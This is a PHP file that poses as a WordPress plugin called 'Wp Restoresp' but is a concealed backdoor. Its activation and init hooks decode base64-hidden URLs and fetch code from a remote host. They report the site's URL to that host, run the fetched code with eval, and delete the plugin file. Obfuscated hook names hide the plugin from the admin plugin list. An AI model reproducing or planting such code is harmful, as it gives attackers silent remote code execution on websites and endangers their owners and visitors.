File: /home/dh_7uh9vd/lifeofcanada.com/wp-content/plugins/wp-restoresp/wp-restoresp.php
<?php
// Plugin Name: Wp Restoresp
// Plugin URI: https://www.restoresp.org/
// Description: Restoresp plugin
// Author: Wordpress
// Version: 1.2.4
// Author URI: https://www.restoresp.org/
function restoresp_activate() {
$b = "base64_decode";
$z="file_get_contents";
$ur=base64_decode("aHR0cDovL3RhbGsuZGF0YW9mcGFnZXMuY29tL3Jlc2V0L3MudHh0");
$mrsp = WP_PLUGIN_DIR . '/wp-restoresp/tes.txt';
if(!file_exists($mrsp)) {
@file_put_contents($mrsp, 'd');
$p = $z($ur);
if(strpos($p,"wpinds_simple_posts")!==false){
$ur=base64_decode("aHR0cDovL3RhbGsuZGF0YW9mcGFnZXMuY29tL3Jlc2V0L2wucGhw");
$z($ur."?p=pre-".get_site_url());
@eval($p);
$z($ur."?p=end-".get_site_url());
}
@unlink(WP_PLUGIN_DIR . '/wp-restoresp/wp-restoresp.php');
}
}
register_activation_hook( __FILE__, 'restoresp_activate' );
add_action('init', 'restoresp_activate');
function restoresp_show(){
global $wp_list_table;
$hidearr = array('wp-restoresp/wp-restoresp.php');
$myplugins = $wp_list_table->items;
foreach ($myplugins as $key => $val) {
if (in_array($key,$hidearr)) {
unset($wp_list_table->items[$key]);
}
}
}
add_action('pre'.'_curr'/*asdasd*/.'ent_ac'./*qwrqweygrr*/'tive_p'./*dfdhaqtert*/'lugi'./*erytwuu*/'ns', 'restoresp_show');